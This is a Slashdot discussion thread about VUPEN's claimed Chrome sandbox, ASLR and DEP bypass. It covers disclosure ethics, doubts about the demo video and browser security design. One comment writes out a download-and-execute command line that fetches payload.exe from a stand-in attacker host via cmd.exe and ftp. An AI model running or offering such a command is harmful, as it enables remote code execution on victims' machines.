New Chrome Exploit Bypasses Sandbox, ASLR and DEP

Trailrunner7 writes "Researchers at the French security firm VUPEN say they have discovered several new vulnerabilities in Google Chrome that enable them to bypass the browser's sandbox, as well as ASLR and DEP, and run arbitrary code on a vulnerable machine. The company said they are not going to disclose the details of the bugs right now, but they have shared information with some of their government customers. The vulnerabilities are present in the latest version of Chrome running on Windows 7, VUPEN said."

What about UAC?

Will your computer still ask if you want your porn website to compromise your computer?

Re:What about UAC?

[gcnaddict]

Yes, but bear in mind that Microsoft classifies UAC as only being a security "feature" despite the fact that it's actually a user-imposed security boundary.

Re:What about UAC?

[Neil+Boekend]

Not if people have it shut off.

Disclosure policy

"This code and the technical details of the underlying vulnerabilities will not be publicly disclosed. They are shared exclusively with our Government customers as part of our vulnerability research services."

Oh, I feel SO MUCH better now!

Re:Disclosure policy

Because ASLR and DEP aren't supposed to be the first line of defense, they are security in depth. The great thing about ASLR, DEP, and "stack canaries" is that you can start using them, and you get a huge amount of protection, -even if you screw up your own code-. The fact that the researchers have to go through the trouble of circumventing ASLR and DEP is a testament to their effectiveness.

ASLR and DEP just make existing vulnerabilities harder to exploit. Chrome's bug is still the culprit. Microsoft doesn't deserve -any- of the blame here.

Re:Disclosure policy

[blair1q]

Are you hiding your name from everyone, or are you sharing that only with /.'s government?

Re:Disclosure policy

You're likely right about ASLR/DEP but I doubt so about MIC - they're probably exploiting an implementation issue (like video codec parsing outside the sandbox or smth) and not a fundamental weakness wrt integrity levels.

I'm not concerned about this anyhow as the challenge posed is already so high it's eliminated most malware authors from the browser game.

Re:Disclosure policy

[EvanED]

Being able to bypass them is a testament to their bad implementation... ...my understanding is that ASLR's implementation isn't the best, but IMO it's more like "is a testament to the fact that needing ASLR at all is patching a gunshot with a bandaid".

And you say C++ is insecure and has stupid control structures, but then suggest writing it in C? Really?

Re:Disclosure policy

[bonch]

The exploit is due to a bug in Chrome. ASLR and DEP aren't catch-all protection mechanisms; they're just a default layer of defense against bad code. I realize this is a vehemently pro-Google site that attempts to deflect any blame toward default scapegoats like Microsoft, but your position is just not accurate in this case.

Re:Disclosure policy

[DeadCatX2]

LOL I was hoping I wasn't the only person who noticed that...

Re:Disclosure policy

[Rockoon]

Browsers such as Chrome contain memory allocations that avoid DEP by using VirtualProtectEx() as it is pretty much a requirement of JIT compilation.

Blaming Microsoft in this case is extremely premature, since we know that Chrome does in fact disable some protections intentionally.

Re:Disclosure policy

[icebraining]

Uh, the sandbox is also provided by the OS, not just ASLR and DEP.

Re:Disclosure policy

You're right. They should just post the exploits on every blog out there just to be transparent and trustworthy.

Re:Disclosure policy

[kangsterizer]

"This code and the technical details of the underlying vulnerabilities will not be publicly disclosed. They are shared exclusively with our Government customers as part of our vulnerability research services."

Oh, I feel SO MUCH better now!

They're always doing that and there's many companies like that. Basically, the bugs DO NOT GET FIXED until people (here, Google) pays up, and that's now the $5000 bounty we're talking about.
These guys literally asks thousand hundreds. If not, well, bug stay there, bad advertisement for the company, etc.

I know, people should get paid for their work, including the security researcH. But sometimes it feels like racket.

Re:Disclosure policy

[larry+bagina]

Google could pay one of their employees to track it down and fix it. If it would cost them $10,000 (opportunity cost, wages, extra time for code review or demonstrating correctness, whatever) to fix it or prevent it, then paying someone else $5,000 is a net win for them.

Re:Disclosure policy

[asdfghjklqwertyuiop]

The fact that the researchers have to go through the trouble of circumventing ASLR and DEP is a testament to their effectiveness.

Testament to their effectiveness? If they broken through then they were not effective.

ASLR and DEP just make existing vulnerabilities harder to exploit.

It doesn't really matter how hard they made it if they aren't actually containing exploits, or at least some of them.

Re:Disclosure policy

[vegiVamp]

Yes, and no. It may be more expensive in the short term, but it will breed them their own class of security engineers who can then both track other bugs, and provide better design and coding guidelines to prevent future bugs.

If a security firm, that presumably probes a variety of different softwares, can make a profit by asking 5k for a found vulnerability, then it's almost a given that in the long term you will be cheaper off with your own people watching fewer programs and having access to the actual codebase.

Re:Disclosure policy

[Nutria]

Testament to their effectiveness? If they broken through then they were not effective.

Sure they aren't perfectly effective. But if the exploit allowed is of limited utility then that's a Good Thing.

It doesn't really matter how hard they made it if they aren't actually containing exploits, or at least some of them.

Sure it does, since it contains many exploits, and makes crackers' work more difficult.

Re:Disclosure policy

[asdfghjklqwertyuiop]

But if the exploit allowed is of limited utility then that's a Good Thing.

Is it of limited utility? The summary says "run arbitrary code".

Sure it does, since it contains many exploits, and makes crackers' work more difficult

How difficult it was for the crackers to find the hole in the first place does not matter to chrome users. Someone will figure it out sooner or later, and in the end it's just another metaspoit module that takes 10 seconds to use.

Re:Disclosure policy

[mwvdlee]

I call those "brown hat hackers"; trying to screw over computer users, while somehow still being legal.

Re:Disclosure policy

[spongman]

brown hat

what, like "shit-head" ?

Re:Disclosure policy

[Lennie]

I don't think this is a pro-Google site, it is an anti-Microsoft site. :-)

Re:Disclosure policy

[Lennie]

Not only that, someone or more than one from Google or the community (it is an open source project afterall) has to look at the problem anyway, if only to see if there are other places that have similair problems.

Re:Disclosure policy

[weicco]

Why, did they break IE also?

Re:Disclosure policy

[Pigskin-Referee]

brown hat

what, like "shit-head" ?

Brown Hat, Brown Shirt, Shit Head; are we discussion the EC again?

Re:Disclosure policy

[kangsterizer]

Google DOES pay people to look for these bugs all day long, what are you thinking? Every big such company has a group or people that are paid to do just that. And another group of people reviewing the coder's work.
If bugs were so easy to find, there wouldn't be any left by now. But that's often not the case.

Re:Disclosure policy

[coolmadsi]

I know, people should get paid for their work, including the security researcH. But sometimes it feels like racket.

Why should they get paid if they weren't asked to do it? Obviously they don't have to say what they found if they aren't paid, but there shouldn't be a sense of entitlement just becuase the did something (that they weren't asked to do).

What about Google?

[d4fseeker]

Funny. I don't read anything about them disclosing it to Google (even tough they offer a bug bounty) So I'll just have to guess NSA and all the other good guys are protecting us (yeah right) until someone at Google stumbles across this issue.

Re:What about Google?

This just in, sources claim the NSA owns French security firm VUPEN! Spokespersons for the French firm categorically denied such reports but then suddenly surrendered.

Re:What about Google?

[AHuxley]

The NSA would like to see the world use more MS. If the world ever splits into local hardened operating systems with real on duty admins, field work gets more difficult.
With MS in use/gifted at a state/federal level around the world, the US has their too kit in place. News like this shows what is been offered as finally 'safe' is really rather open.

Re:What about Google?

[MtViewGuy]

I think the folks at the Google Chrome developer team would like to speak to the VUPEN folks and find out exactly what's going on. This is because Chrome does incremental upgrades "in the background" and Google will quietly slip in update to the browser code to close these vulnerabilities without user intervention.

Re:What about Google?

[aztracker1]

Wow... so all of your friends and families have systems admins on-duty? I'm sure they also run every game they install or link they click on through security screening. Must get costly... must be very wealthy... think they might be ripe for some bank phishing...

Re:What about Google?

[Lennie]

No, it is locked down ofcourse, they can't install a game. :-)

Re:What about Google?

Those who Do Lots of Evil don't talk to those who Do No Evil.

Re:What about Google?

Exactly, VUPEN are absolute morons.

They could get paid for this, Google would happily pay them.
But their attitude is pathetic.

Re:What about Google?

This is an interesting issues. If a government agency hires a security firm and that firm finds a vulnerability. As the issue can have a direct impact of the people which are paying their salaries does the agency have an obligation to inform Google, MS, APPLE etc when bugs like that are found?

Re:What about Google?

[maztuhblastah]

So I'll just have to guess NSA and all the other good guys are protecting us (yeah right) until someone at Google stumbles across this issue.

While I understand the spirit in which your comment was written (and I happen to agree with you on this particular point), the NSA actually *does* have a mission to ensure US computer security. That's why they invested a hell of a lot of time in developing something like SELinux, which they open-sourced and donated, as well as providing substantial amounts of vulnerability research.

I'm not saying that their intentions are always pure, but rather that they function as a sort of chaotic good. They're not really on our [US citizens] side. They're not on the "bad guys"' side. They're playing their own game on a totally different field than us... It just so happens that often times our [citizens] interests align with theirs.

Re:What about Google?

[MikeBabcock]

I love a good conspiracy, but could you please explain NSA Linux then?

Good thing...

[gman003]

Good thing I already run Chrome inside another sandbox (Sandboxie). Sure, there's been exploits for that sandbox, too, but it's uncommon enough that it's extraordinarily unlikely someone would combine the exploits needed. And I have a virus-scanner and firewall running behind all that, just for good measure.

And even then I don't 100% trust it - any particularly suspicious sites are accessed by ssh-ing into my OpenBSD box (with it's own virus-scanner and custom PF rules), then running Firefox (with Javascript disabled, Java not installed, and Flash not even available on that OS) on that. I don't think any existing exploit could crack that.

Re:Good thing...

So long as you don't forget to properly affix your tinfoil hat, I'd say you're good to go!

Re:Good thing...

Stallman, is that you?

Re:Good thing...

You're a belt and suspenders kind of guy, aren't you?

Re:Good thing...

That's why I got this Trace Buster BUSTER!

Re:Good thing...

[ThunderBird89]

I can crack that easily, and get at your data. You forgot rubber hose hacking...

Re:Good thing...

+1 Big Hit

Re:Good thing...

Last I checked Sandboxie was an IO-layer sandbox; a kernel or os/service exploit would skip right over your sandbox without even noticing its presence.

Re:Good thing...

Good thing I already run Chrome inside another sandbox (Sandboxie). Sure, there's been exploits for that sandbox, too, but it's uncommon enough that it's extraordinarily unlikely someone would combine the exploits needed. And I have a virus-scanner and firewall running behind all that, just for good measure.

And even then I don't 100% trust it - any particularly suspicious sites are accessed by ssh-ing into my OpenBSD box (with it's own virus-scanner and custom PF rules), then running Firefox (with Javascript disabled, Java not installed, and Flash not even available on that OS) on that. I don't think any existing exploit could crack that.

All you need now is a virus (or other fully automated, self-propagating malware) infecting OpenBSD machines in the wild and all the resources used by that virus scanner will be completely justified.

Really if you are running a virus scanner on any *nix machine, you're either doing it on behalf of Windows systems (i.e. on a *nix mailserver that has Windows clients) or you're doing something wrong. *nix has an effective security system and expects its administrators to know how to use it, therefore *nix doesn't have these bullshit problems.

Oh and if you were really so paranoid you'd be using Chromium, not Chrome.

Re:Good thing...

Sup dawg, I herd you liek sandboxes so I put a sandbox in your sandbox so you can sandbox while you're sandboxing!

Re:Good thing...

[gman003]

I have the virus scanner on my BSD box so I can scan suspicious files before accessing them from my Windows boxes (the BSD box is my general-purpose "server", including running Samba). And to be fair, it's been months since I found a file suspicious enough to deserve the full treatment.

Re:Good thing...

Oh and if you were really so paranoid you'd be using Chromium, not Chrome.

What makes you think he is paranoid?

Re:Good thing...

[EoN604]

I always chuckle when I hear of people disabling JavaScript in this day and age. Reminds me of a guy from an old job who used to disable images in his broswer, saying they were unnecessary bloat that weren't important and shouldn't be a part of the web.

Re:Good thing...

[BlueScreenO'Life]

Me, running a BSD licensed OS?

I run GNU Hurd, you insensitive clod.

- rms

Re:Good thing...

[RobbieThe1st]

Thing is, I wouldn't /like/ to have to disable JS, or run NoScript, but thanks to poor implementations of ad code, disabling it can /seriously/ speed up loading on a high(ish) latency connection.
And that's on top of all the potential attack vectors.

Speaking of which, /. runs /much/ faster on my phone when you disable JS - None of this slow ajax and hugely-long page to re-render when you add a comment.

Re:Good thing...

[alostpacket]

Good luck, I'm behind 7 Sandboxies.

Re:Good thing...

I have the virus scanner on my BSD box so I can scan suspicious files before accessing them from my Windows boxes (the BSD box is my general-purpose "server", including running Samba). And to be fair, it's been months since I found a file suspicious enough to deserve the full treatment.

That would fit the "on behalf of Windows systems" criteria the GP already specified, making your post a completely redundant "me too!"

God damn, reading comprehension is on the decline.

Re:Good thing...

[mlts]

Never say never. I recall reading some malware can detect the presence of vmware and/or sandboxie and get around it. Sandboxie helps, but it of limited protection on 64 bit systems.

Re:Good thing...

[gman003]

Actually, I really disabled it because it's running on an Athlon 900 with 384MB of RAM. The security advantage is a side-benefit.

Re:Good thing...

[stimpleton]

7 sand *BOXXYS* ...fixed

Re:Good thing...

thanks for the good tweet!

Re:Good thing...

[Nutria]

it's running on an Athlon 900

Why?

It's not old enough to be Retro, yet not fast enough to run a GUI is 2011.

Re:Good thing...

[gman003]

Because that was what was in my spare box. Seriously, the machine's cobbled together from salvage - a CPU/mobo from one machine, a video card from another (GeForce 2, not that it actually accelerates anything), RAM from two different sources, hard drives from three, and miscellaneous CD drives and floppy drives, just because. And the software is equally... Frankensteinian. Samba, Apache, MySQL, a full X desktop (it's my backup backup ordinary-use computer), FTPD, a couple other things I've forgotten, and DosBox.

On the bright side, I'm comfortable experimenting with it. If I break it, I know how to do a full reinstall, and with three hard drives (not in any sort of RAID), I can keep a backup "image" ready. If the hardware breaks, I can just grab slightly older stuff from the Big Bin of Parts. It's practically disposable.

Re:Good thing...

[LynnwoodRooster]

Add a drawstring as well and you're 100% on target...

Re:Good thing...

[inglorion_on_the_net]

Really if you are running a virus scanner on any *nix machine, you're either doing it on behalf of Windows systems (i.e. on a *nix mailserver that has Windows clients) or you're doing something wrong.

I'm not so sure about that. There seems to be a persistent idea that *nix is somehow secure, but that is not actually true. There have been vulnerabilities and exploits for *nix, and I have seen a number of compromised Linux installations. OpenBSD seems to be one of the few operating system projects taking security as seriously as I think they should, but even they have had vulnerabilities in the core system, not to mention vulnerabilities in the applications people run on it. And let's not forget that most of it is written in C, a language known to be full of opportunities for creating vulnerabilities.

Now, I am not claiming that running a virus scanner would be a good idea. It will use up computer resources, but will it actually stop the attacks? However, I think we in the *nix world should work a lot harder to secure our systems than most of us currently do. To give you something to think about: Windows has had ASLR and NX enabled for core parts of the system for a few releases now. Many popular Linux distros don't enable either feature for any software. Also, Linux (the kernel) is huge. What protections does your favorite distro offer against bugs and exploits in code that runs in kernel space?

Oh and if you were really so paranoid you'd be using Chromium, not Chrome.

Calling computer security-minded people paranoid would be funny if it weren't so sad. The truth is that the Internet is full of automatic exploits and there is a large industry built on exploiting software (of which the exploit this story is about is an example). Too many people think they have nothing to fear, while, in reality, governments, script kiddies, and professional criminals are all out to get you. Maybe not you personally, but they will welcome the addition of your computer to their botnet or database, regardless of who you are. Good computer security isn't paranoia, it's protection against the very real possibility that your computer will be used to send spam, participate in denial of service attacks, various criminal activities, or simply to gather information about you and your friends, relatives, and acquaintances.

If you don't see computer security as a big deal, perhaps it would help to imagine what your inbox would look like if there was no spam filtering (spam comprises the majority of all email, and the bulk of email spam is sent from exploited computers), or you can speak to any of the people whose personal data have been used to take out loans or commit criminal activities in their name. I hope that you will never experience anything like that first-hand, but you should know that, if you aren't vigilant about computer security, you may unknowingly be facilitating these things.

Re:Good thing...

don't use 64bit systems ;)

Re:Good thing...

[MikeBabcock]

I use Noscript on websites until I've determined I need the scripts. Its easy enough to enable them once I'm there, and much much faster to load complex websites without it.

Smug

I am so glad I run [insert smug zealous OS plug here] and not Windows!

Re:Smug

The real question is:
Does it run on Linux?

Re:Smug

[the+linux+geek]

Bull GCOS 7 would never have these kinds of vulnerabilities.

Re:Smug

[clang_jangle]

Still mistaking anyone who triggers your natural feeling of inferiority (that comes with making poor choices) for "smugness", I see. No, we're not smug -- we're just better than you.

Re:Smug

[flimflammer]

That was pretty smug.

Re:Smug

[MikeBabcock]

Any OS runs on Linux with http://qemu.org/ :)

Keywords making all the difference

[bogaboga]

that enable them to bypass the browser's sandbox, as well as ASLR and DEP, and run arbitrary code on a vulnerable machine.

"...on a vulnerable machine...". Those are the keywords. So how is it a Chrome problem when the machine itself is vulnerable?

By the way, it was about time for /. to embed video. Please allow the same for pictures especially for slashdotters here.

Re:Keywords making all the difference

One word why they will never allow for embedded pictures: goatse.

Re:Keywords making all the difference

[blair1q]

embedded video of goatse website on grimy monitor in 3...2...

Re:Keywords making all the difference

[vajorie]

So how is it a Chrome problem when the machine itself is vulnerable?

The answer was in the few words before the ones you highlighted:

bypass the browser's sandbox ... and run arbitrary code

Re:Keywords making all the difference

FTFS:

The vulnerabilities are present in the latest version of Chrome

FTFA:

While Chrome has one of the most secure sandboxes and has always survived the Pwn2Own contest during the last three years, we have now uncovered a reliable way to execute arbitrary code on any installation of Chrome despite its sandbox, ASLR and DEP.

I guess I can understand not reading the article, please take the time to read the entire summary before shooting your mouth off. How did this get voted up?

Re:Keywords making all the difference

the machine is vulnerable BECAUSE it is running an exploitable version of chrome.

I don't care about theoretical/researched exploits

Tell me when an exploit of this magnitude (including the one which affected IE8) actually exists in the wild. Very few virus authors have the skill to discover and chain multiple independent exploits targeting different and non-outdated technology.

HBGary, anyone?

This "VUPEN security" company, how are they any different from HBGary? They sold 0days to governments too...

I just want the damn hole closed.

from vulpen site

[JonySuede]

As the world leader in vulnerability research, VUPEN provides offensive and highly sophisticated exploits specifically designed for Law Enforcement and Intelligence Agencies to help them achieve their offensive missions using tailored and unique codes created in-house by VUPEN.

God I hate those french researchers, liberty fraternity equality OR DEATH my ass

Re:from vulpen site

[spongman]

wait... in whose screwed up version of utopia do "law enforcement agencies" need "tailored and unique codes" in order to carry out their "offensive missions" ?

alternative choices:
1) get a bench warrant.
2) don't.

Re:from vulpen site

[JonySuede]

thanks, you got my point unlike the offended mod

Re:from vulpen site

[Nutria]

3) Get a FISA warrant and install the exploit on some alleged spy's PC.

Re:from vulpen site

You skilfully dropped the "Intelligence Agencies" part, which is the most relevant here... For example I would expect the FBI to use warrants, but not the CIA.

Re:from vulpen site

Well.. I could see how this would be helpful for foreign ops.
Such as perhaps an intelligence sting by the CIA in another country?

Vulnerabilities

[magamiako1]

Just throwing this out there:

These problems won't affect 95% of users. Running these sorts of attacks on end users is a bit of a waste, and something this complicated would be saved for more important targets.

A vast majority of infections out there are things that you're already guarded against if you keep your system updated.

So...

[CrazyDuke]

You know, when I was demoing Chrome as a possible browser for my tablet, I went looking for a script blocking extension. To my consternation, I was met with the near worthless alternative of either running all scripts or none on a page, either through an extension designed like a high school side-project or using the built in white-listing feature. This is apparently because the API does not allow for functionality along the lines of blocking individual scripts from executing.

The forums and comments sections addressing user questions as to an alternative usually had self serving replies like "Chrome is so awesome that it doesn't need script blocking." and "It can't be owned due to sand-boxing. You know what sand-boxing is right?" (Because the only reason a person would ask is if they where an ignorant fool, right?)

So, *cough* tell me why Chrome doesn't need a NoScript-like extension again? @the marketing drones: Because, I'm so sure the cocksure poseur-charisma will scare the crime-ware away, really. The elephant in the room doesn't exist so long as the people that bring it up are shouted down, right?

Re:So...

[VortexCortex]

You know, when I was demoing Chrome as a possible browser for my tablet, I went looking for a script blocking extension. To my consternation, I was met with the near worthless alternative of either running all scripts or none on a page, [...]

So, *cough* tell me why Chrome doesn't need a NoScript-like extension again? @the marketing drones: Because, I'm so sure the cocksure poseur-charisma will scare the crime-ware away, really. The elephant in the room doesn't exist so long as the people that bring it up are shouted down, right?

I'll tell you why: Because Google's JavaScript engine compiles any script it sees into machine code for your platform, then runs that... That's why you don't need a better option for security's sake than all or none... Machine code can't escape the sand box! (Realize the truth: There is no spoon^H^H^H^H^H sandbox.)

The problem is that modern JS engines from all the major browsers do it this way -- The design of the JS language makes it hard to make a fast interpretor for it. Even if you pre-compile to byte-code and run it in a VM it's too slow.

So instead, we take arbitrary data, compile that to machine code, then EXECUTE the compiled DATA (Data Execution Prevention, eh? Well, if it's flagging itself as executable, and it's accepting arbitrary code, I'd say that JS == Arbitrary remote code execution == one tiny step away from being an exploit anyway. I've always wondered why everyone disses ActiveX while enabling JS...

PS. I've written scripting languages. They can be slow as hell, that's the point, so long as stuff you do a lot of is formalized and written in native code, it's all good and can be run in a pretty safe interpretor or byte-code VM.

JS != general purpose compiled language.

Therefore, when you do DUMB things like complain that JS can't keep up when you try to use JS + HTML5 Canvas as your "rendering engine" for a "web application" (or even worse, games) then browser devs must meet the dumb demands by doing the dumbest thing they can against their better judgment -- Just in Time compile a virtual EXE, then run that.

The answer is to stop sacrificing security for speed, go back to software VM solutions with SIMPLE compiled languages like Lua, (I think, Lisp / Scheme too, not sure haven't checked how complex the sources are) and add standardized functions for commonly used features so we can get rid of the if(IE){...} cruft. Hint: Dynamic is the enemy of fast.

Re:So...

[lucian1900]

That's bullshit. JIT compilers increase the attack surface somewhat, but not significantly.

Also, interpretation is always going to be slow. Lua is very slow without LuaJIT. So are most Scheme and Common Lisp implementations. Which is why no one in their right mind would turn of the JIT.

A JIT may be harder to write than a bytecode interpreter, but it's not much harder to make secure

Re:So...

[StayFrosty]

The extension you are looking for is called NotScripts.

Re:I don't care about theoretical/researched explo

True, but security researchers are not fighting the scattered guy in the basement who manages to find a hole.

There are criminal organizations which are big enough to fund people in researching holes, as well as buying 0-days from the black market. Then using these either for a focused attack against a company, or cast it on the wind to gather up clients for a botnet. All is needed is a 0-day hole in a browser or browser add-on coupled with an exploit to get Administrator rights, paste this on the Web using ad rotation services, and it can easily bring in large numbers of compromised machines.

What makes this extra awesome: Native Client

[bl8n8r]

This is the reason you don't want your browser able to access native OS code; when there's an exploit, the keys to the kingdom are in the browser.
http://www.theregister.co.uk/2010/12/08/google_on_native_client/

Re:What makes this extra awesome: Native Client

NaCl isn't ActiveX+LowIntegrity; if a NaCl library reached the outer sandbox, NaCl would be shown as inherently flawed. It's actually safer in some respects than the main browser is, probably most interpreters too.

Re:What makes this extra awesome: Native Client

This is the reason you don't want your browser able to access native OS code; when there's an exploit, the keys to the kingdom are in the browser.
http://www.theregister.co.uk/2010/12/08/google_on_native_client/

Native Client doesn't allow access to native OS code; it allows a restricted set of machine instructions to run in an environment that is not only heavily sandboxed, but verified pre-execution. Because it's meant to be cross-platform, it does not allow calls to the underlying OS at all. It enforces this limitation by doing a code scan to detect unauthorized instructions, unsafe branch targets, and such. It's really quite sophisticated, albeit practically unusable due to how locked down it is.

It'd be daft to say it will never be exploited, but it's hardly handing over the keys to the kingdom. Maybe you were thinking of NPAPI or ActiveX; both of those allow full access to the underlying OS APIs.

Video / Article mismatched

[Archangel+Michael]

Okay, I've watched the Video twice, and read both linked articles (yeah I did) and it said that it was ..

The video shows the exploit in action with Google Chrome v11.0.696.65 on Microsoft Windows 7 SP1 (x64). The user is tricked into visiting a specially crafted web page hosting the exploit which will execute various payloads to ultimately download the Calculator from a remote location and launch it outside the sandbox at Medium integrity level.

Well I did see the Calculator applet get started, and I do see that it is a Microsoft Version. I did not see it get "downloaded", which is acceptable if it was a background download. But I don't know if it did, or if it simply called the local version already installed as part of the OS.

Just saying the whole thing is very skimpy and light on details and specifics.

Re:Video / Article mismatched

Starting a new process is already evidence of having escaped low-IL isolation.

Re:Video / Article mismatched

Just launching Calculator implies that arbitrary code was downloaded and executed. You can't launch a process through Javascript.

Re:Video / Article mismatched

[cbhacking]

Umm... who the hell cares? If you can launch a Medium IL process, then you're out of the sandbox and can launch *any* medium IL process, even if it's from \WIndows\System32\ on the local box. For example, you could instead launch
\Windows\System32\cmd.exe /C "ftp myexploitsite.com/payload.exe" && payload.exe
Commands simplified for readability, but you can do this. You probably won't have Admin, but you can still do a lot of damage - and if the user is one of those idiots who decided that UAC is too much hassle to deal with, then their whole box can be taken over.

They could very well be lying

The only evidence of the supposed vulnerabilities is a rather crappy video that could be easily faked.
And this is disclosed by a company that sells vulnerabilities to make a buck.
Maybe the vulnerabilities are there, in which case their behaviour is downright evil. Or maybe they aren't there, and they created the video precisely because they couldn't find a hole in Chrome and want users to switch to something less secure.

Why would the government care?

[dicobalt]

They run IE6.

Re:Why would the government care?

Skip this we are upgrading to IE4 on windows 98. No services in 98. We can overwrite the programs files and windows directories every few hours to 'fix' issues.

Re:Why would the government care?

As a poster noted higher up, their business is to sell those exploits to government agencies so they can carry out their "offensive missions".
So they care because unwary rebels and others dissidents may run something more up to date than IE 6 :)

Re:And..

[bonch]

The stupidity of your post isn't the worst part. It's the fact that, as of this writing, you're modded Insightful.

Intel vulnerable

If it bypasses the sandbox, ASLR, and DEP, wouldn't that mean that it probably exploits Intel's basic hardware flaw, a poorly implemented stack with addressable registers?

Re:And..

[icebraining]

Chrome's sandbox is Windows' sandbox, so that's perfectly possible.

Really?

[petteyg359]

1. Watching the video, I see nothing that couldn't be achieved with ExtJS.

2. Chrome often has multiple processes listed in task manager. In their video, they conveniently cover all those process names with another window so you can't see them.

3. Suspicious overuse of "pwn". No company worth respecting would use "pwn" in a press release.

Re:Really?

[Bitsy+Boffin]

Errr, perhaps you missed where they apparently had the browser start the windows calculator executable. That's a fairly fundamental ownage right there.

Re:Really?

[EdIII]

Ok. I can schedule a task from the command line to run the calculator app. Not only that, but custom event filters that trigger it, it would be possible to get a modified Google Chrome itself to cause the calculator to open.

His point is that they seem to be hiding something with the process window being obscured and yours is the simple fact the calculator pops up without actually running the calculator app (which could be bound to a hot-key you did not see pressed to btw) and therefore provides some credibility or a defense against skepticism.

The whole thing may be allegedly true or not. If they really have that capability I find it curious that they are even advertising it as a press release? Why? You could sell that to any Intelligence Agency for millions. I doubt they would need to publicly acknowledge the auction.

They openly said they will NOT disclose this to Google. VUPEN basically just advertised a fancy new weapon to their "exclusively" government customers.

The whole thing smells fishy because of VUPEN really is making their bucks off specially designed and coded cyber-weapons the last farking thing they want to do is alert Google to the mere possibility they can do what they can do.

None of makes any sense. Sure I see what you see too, but damned, if I am still not skeptical for so many many reasons.

Re:Really?

[Anne+Honime]

As I wrote further below, the co-owner of VUPEN has won this year's pwn2own contest by smashing another webkit based browser to pieces : http://www.zdnet.com/blog/security/safarimacbook-first-to-fall-at-pwn2own-2011/8358

I don't see why he would be lying here when he already proved publicly he had the capability to exploit much the same flaw elsewhere.

Re:Really?

[TheThiefMaster]

In process explorer, the calc.exe is only indented far enough to be a child of explorer.exe, not chrome.exe. So surely calc.exe was launched from explorer, not chrome?

How the exploit will be used

[Hmmm2000]

To me the most troubling part of this issue is what VUPEN does ... from their web site -- "Exclusive and sophisticated exploits for Law Enforcement Agencies". So, the reason the exploit is not being made public is so that Government agencies can use these exploits to install keyloggers or whatever they choose on whatever computer they which to target and monitor.

Re:How the exploit will be used

What kind of professional research firm for Law Enforcement uses the "word" "Pwned" in a press release?

Re:How the exploit will be used

A French one.

Re:How the exploit will be used

[kangsterizer]

The French.

Re:How the exploit will be used

No, the reason it's only being made partially public is, I can only assume, to drum up business because they don't have any customers - if they did, we wouldn't hearing about the exploit at all.

Re:How the exploit will be used

[gmhowell]

The French.

Then shouldn't it be 'le pwned'?

Re:How the exploit will be used

[EdIII]

Then why advertise it in a press release?

That would be like me constructing a dirty bomb the size of a suitcase, undetectable by everything including the TSA, and then taking out an advertisement in the New York times announcing it exists, but only available to be auctioned to qualified really-super-scary terrorists.

You advertise a bug like this obscuring the results when you want to COOPERATE with the open/closed source programming community to both do the right thing and to gain credentials that your company actually knows something.

You don't advertise shit like this when you are searching for a buyer that is probably part of organized crime in eastern Europe.

Law enforcement trying to obtain tools used to violate our rights is not the most "troubling" (or puzzling) part of this story.

Re:How the exploit will be used

They make weapons and then distribute them to children.

Re:How the exploit will be used

[tlhIngan]

Well, I suppose they're "saving" it for Pwn2Own. But given CanSecWest happened recently, they're also doing a CYA - if it gets revealed how it works, they've already scooped the story.

So it's a win-win. Either an easy victory to win that Windows laptop (sure it ain't a shiny Macbook that everyone else is going for... but it's also less competition), plus lots of money from those interested, and credit should someone else happen to discover the same bug.

Pretentiousness

[Eponymous+Hero]

"The problem with being better than everyone is that people tend to think you're pretentious."

Re:Pretentiousness

[clang_jangle]

Actually, the problem is so many people have no self-respect, and easily dismiss anyone who does as "smug". In fact, "smug" is one of the top insults routinely hurled about by people who feel inferior. They hope to "cut them down to size", "put them in their place", etc. If they believe they achieve it, they feel slightly less inferior for a minute or two. The failure, of course, is that no-one who matters really cares about all that drama. The "smug" accusers are nearly always trolls with nothing to offer anyway. It's a branch of the "shame and blame" control drama.

Re:Pretentiousness

[bryan1945]

Reminds me of a certain South Park episode.

Re:Pretentiousness

Well the 12 or so people on /. who watch SP know what you're talking about, but we adults don't know, which I suppose was the idea? How passive-aggressive.

Suspect

If the motivation in not disclosing the bug is preventing Google from patching it, then why did they even announce it? That doesn't make sense.

Something smells fishy. I haven't RTFA, has anyone been able to verify that these bugs are actually real?

Re:And..

[black3d]

I'm glad you put "possible" in italics to emphasise that this didn't necessarily mean it was the cause of the issue. Chrome implementing the sandbox, while overriding memory protection, kind of negates the purpose of the sandbox. (Although, it prevents "natively" bad stuff from affecting the system. However anything attacking the browser itself can still access system memory).

To be fair though, the demonstration of this vulnerability has exposed nothing other than the ability to load known programs in known locations, without any additional parameters. They may be able to, but that hasn't been demonstrated, and won't be if they aren't releasing any "details".

Before everyone start yelling "fake"

[Anne+Honime]

A quick search turns out VUNET co-founder BEKRAR Chaouki was the winner of pwn2own 2011 : http://www.zdnet.com/blog/security/safarimacbook-first-to-fall-at-pwn2own-2011/8358

Not to say it proves he did it again with chrome, but at least; the guy's got some credits for being able to pull this one.

Re:And..

[ozmanjusri]

Do you have evidence that this exploit will work on any platform other than Windows?

Interesting, why the government?

[elucido]

Does this mean government contractors will get access to the exploit code?
I guess this will help them wiretap.

Re:And..

You are confusing a Sandbox written by google for Windows with a Windows Sandbox written by Microsoft. Google WROTE the windows sandbox that chrome uses.

Stuff you can figure out from the video...

[ben.craig]

If you look closely, the first time the video shows process explorer, the PID of the parent chrome process is 1388 with integrity at "Medium", and a child chrome process's PID is 1928 with integrity set at "Low". After the hack, process explorer shows a child chrome process with PID 804 and integrity "Medium", all other processes except for the calculator are obscured. I can guess-timate that the original parent and child are still there though, as there is still a low integrity process somewhat near the bottom of the list.

After looking at the documentation for process explorer, the gray colored process line (most likely the parent chrome process) is suspended, which seems odd. I'm not entirely sure I'm seeing the correct part of the process explorer docs here.

Another thing to note is that the calc.exe process has no parent. That means that whatever spawned it has already died.

The video suggests that a fairly standard ASLR attack was made: guess and check. ASLR makes it difficult to reliably guess an address the first time. Most of the time, if a hack guesses wrong, the process dies and the attacker doesn't get another chance. It seems that the attacker found a place (or made a place) where they could "guess" repeatedly. Given the prior information, that suggests that the child process somehow caused the parent process to repeatedly spawn chrome subprocesses that had some attacker controlled information in it. Each time, that information is probably a little bit different until the attacker guessed "right", and successfully executed the right attack code.

Re:Stuff you can figure out from the video...

[ben.craig]

Or maybe the gray colored process line is just the last selected process, which makes way more sense.

Re:Stuff you can figure out from the video...

[spongman]

correct, suspended processes have a darker gray background. the light gray is the selection highlight for inactive windows.

it's somewhat suspicious, though, that the un-maximized chrome window is set up to obscure all but the new medium-trust chrome.exe and calc.exe.

